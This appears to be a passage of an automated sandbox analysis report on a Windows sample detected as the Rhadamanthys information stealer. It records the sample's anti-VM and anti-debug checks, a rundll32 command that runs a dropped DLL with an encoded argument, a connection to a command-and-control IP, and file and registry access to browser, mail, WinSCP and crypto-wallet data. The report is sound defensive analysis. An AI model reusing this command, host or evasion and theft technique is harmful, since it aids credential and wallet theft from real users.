                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exeJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: VBoxTrayIPCJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dllJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sysJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00403317 GetSystemInfo,VirtualQuery,KiUserExceptionDispatcher,VirtualQuery,1_2_00403317
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA828C _calloc_dbg,FindFirstFileW,FindNextFileW,4_2_00007DF471DA828C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DA782C FindFirstFileW,FindNextFileW,FindClose,4_2_00007DF471DA782C
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeAPI call chain: ExitProcess graph end nodegraph_1-4346
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW b
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware ToolsE-2E35-11D2-B604-00104B703EFD}\REGISTRY\MACHINE\SOFTWARE\Clas\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Toolsc
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349875511.0000000000477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GY\MACHINE\SOFTWARE\VMware, Inc.\VMware ToolsInformationTarget Id 0\Logical Unit Id 0
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358805117.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
                      Source: rundll32.exe, 00000004.00000003.408357863.0000017ED6ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358259784.0000000002170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE91A8 IsDebuggerPresent,IsProcessorFeaturePresent,4_2_00007FFA06EE91A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE6694 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_00007FFA06EE6694
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_004081BD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004081BD
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00403484 GetModuleHandleA,IsBadCodePtr,VirtualProtect,GetProcessHeap,RtlAllocateHeap,IsBadCodePtr,IsBadReadPtr,IsBadStringPtrA,lstrlenA,GetProcessHeap,HeapAlloc,1_2_00403484
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugFlagsJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeMemory protected: page execute and read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 179.43.163.126 80Jump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns60877c.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dw|ae8angbgowbjrwaxahyhaeljaejvadaawi0cwuid|+wo6aqcaabi|4pekmpmzmxm|4lejbhiivqkvxbiiuwkcf0bsp+lrcqwsikejpabathibwaismde2yqqlqhrdoebeejxg8abjweqgqfaso05lgbzjz8diwwk|0gdyeilwuil9uyravr7aaprsit|yoojiajrwwyfv2viiwqlyppwm||jsitqgeg70f90nkidwibii|8csdvcdcpmg|94sbh1gkylqp9qzkgdogt0b+4reut1cbeqebau|3qfsisa69vi64ti|qdbagbau1x|vldbvefvqvb7qvddawabou1a|02l+eyl8kil79kphfzz8exjsf88qye8cvbfao8ad4xq8|bbi4t7cyjz8ixasi087wephnzqeyo8cd2mlqephmfz8esl|2cgritfhit3|yrei08ytaph|0wd2ugd8tpjv0wfyq+epppwtf+lxegleeuz0v9ia9okaotadp8dqchkdq++wn76aafea9c|exxs|0gb+qr8dxx0|w6dwqfjg8ae|0e7yxnp68al|8eptwxoryss|4tma+t0wdptvqoqdffbixtbanp|m8mkakylwuu3d8hjybedyouqafdbigdveo0zwdof9ke7dlbgekyag||gayp4chlu6|8ksivlqf|vsd+jbpedxeqqxatfo28ycq9mauff|0feqv1bxf9e+11bmxdigexgaf5kaivp6gb+||+|sixad4sydsbm9y2vaysremgz|+j9m30gjv8eti1f|0yz0ovl|1qk|wiaieyl4a+ea3p1iewoedpai9orif9iixwkikygciagp0il8a+es3ugpid|ueinvghejuffqeinjcsfeuil79jofp1+ii1wsgreibdiiczz8ohn7ya|risgjvciqscmil1yyigjhcsahxle9vpwiw7aifijjctycrehmjeg6dhviiuc|i0ytitdokid+|tssiogmeyjzctvoeylpboytilcboqbhctchxggko0ru41hszcmjpdz8enfi9to6fwfmiqc7ngysi2eedjbgpn|iy1pbeqwgkqcf4ppaxxzgbx4mv8humv4du2lhlsk9cixlct4nqhc|0g72hi4g|psv3yzri1jqpoalkdbuacyakygqmoi+od0gus2mmaxsy1u+yrsksbjg+hs6n1rgjbii86mihhi|4x|dbklvujm|i4wgzfijuwkqp8p10ibxhqhysqtcc0b
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns60877c.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dw|ae8angbgowbjrwaxahyhaeljaejvadaawi0cwuid|+wo6aqcaabi|4pekmpmzmxm|4lejbhiivqkvxbiiuwkcf0bsp+lrcqwsikejpabathibwaismde2yqqlqhrdoebeejxg8abjweqgqfaso05lgbzjz8diwwk|0gdyeilwuil9uyravr7aaprsit|yoojiajrwwyfv2viiwqlyppwm||jsitqgeg70f90nkidwibii|8csdvcdcpmg|94sbh1gkylqp9qzkgdogt0b+4reut1cbeqebau|3qfsisa69vi64ti|qdbagbau1x|vldbvefvqvb7qvddawabou1a|02l+eyl8kil79kphfzz8exjsf88qye8cvbfao8ad4xq8|bbi4t7cyjz8ixasi087wephnzqeyo8cd2mlqephmfz8esl|2cgritfhit3|yrei08ytaph|0wd2ugd8tpjv0wfyq+epppwtf+lxegleeuz0v9ia9okaotadp8dqchkdq++wn76aafea9c|exxs|0gb+qr8dxx0|w6dwqfjg8ae|0e7yxnp68al|8eptwxoryss|4tma+t0wdptvqoqdffbixtbanp|m8mkakylwuu3d8hjybedyouqafdbigdveo0zwdof9ke7dlbgekyag||gayp4chlu6|8ksivlqf|vsd+jbpedxeqqxatfo28ycq9mauff|0feqv1bxf9e+11bmxdigexgaf5kaivp6gb+||+|sixad4sydsbm9y2vaysremgz|+j9m30gjv8eti1f|0yz0ovl|1qk|wiaieyl4a+ea3p1iewoedpai9orif9iixwkikygciagp0il8a+es3ugpid|ueinvghejuffqeinjcsfeuil79jofp1+ii1wsgreibdiiczz8ohn7ya|risgjvciqscmil1yyigjhcsahxle9vpwiw7aifijjctycrehmjeg6dhviiuc|i0ytitdokid+|tssiogmeyjzctvoeylpboytilcboqbhctchxggko0ru41hszcmjpdz8enfi9to6fwfmiqc7ngysi2eedjbgpn|iy1pbeqwgkqcf4ppaxxzgbx4mv8humv4du2lhlsk9cixlct4nqhc|0g72hi4g|psv3yzri1jqpoalkdbuacyakygqmoi+od0gus2mmaxsy1u+yrsksbjg+hs6n1rgjbii86mihhi|4x|dbklvujm|i4wgzfijuwkqp8p10ibxhqhysqtcc0bJump to behavior
                      Source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                      Source: rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE1DD4 cpuid 4_2_00007FFA06EE1DD4
                      Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFA06EE3198 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,4_2_00007FFA06EE3198
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeCode function: 1_2_00404608 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,1_2_00404608

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8ee0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8d50000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.17ed8e60000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DAB92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,4_2_00007DF471DAB92C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007DF471DD48E4 socket,bind,4_2_00007DF471DD48E4

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		Path Interception13
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Email Collection                      		Exfiltration Over Other Network Medium2
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts12
                      Command and Scripting Interpreter                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts35
                      Virtualization/Sandbox Evasion                      		21
                      Input Capture                      		771
                      Security Software Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		Exfiltration Over Bluetooth2
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts2
                      Native API                      		Logon Script (Windows)Logon Script (Windows)1
                      Disable or Modify Tools                      		1
                      Credentials in Registry                      		35
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Archive Collected Data                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                      Process Injection                      		NTDS12
                      Process Discovery                      		Distributed Component Object Model1
                      Data from Local System                      		Scheduled Transfer1
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Rundll32                      		Cached Domain Credentials257
                      System Information Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

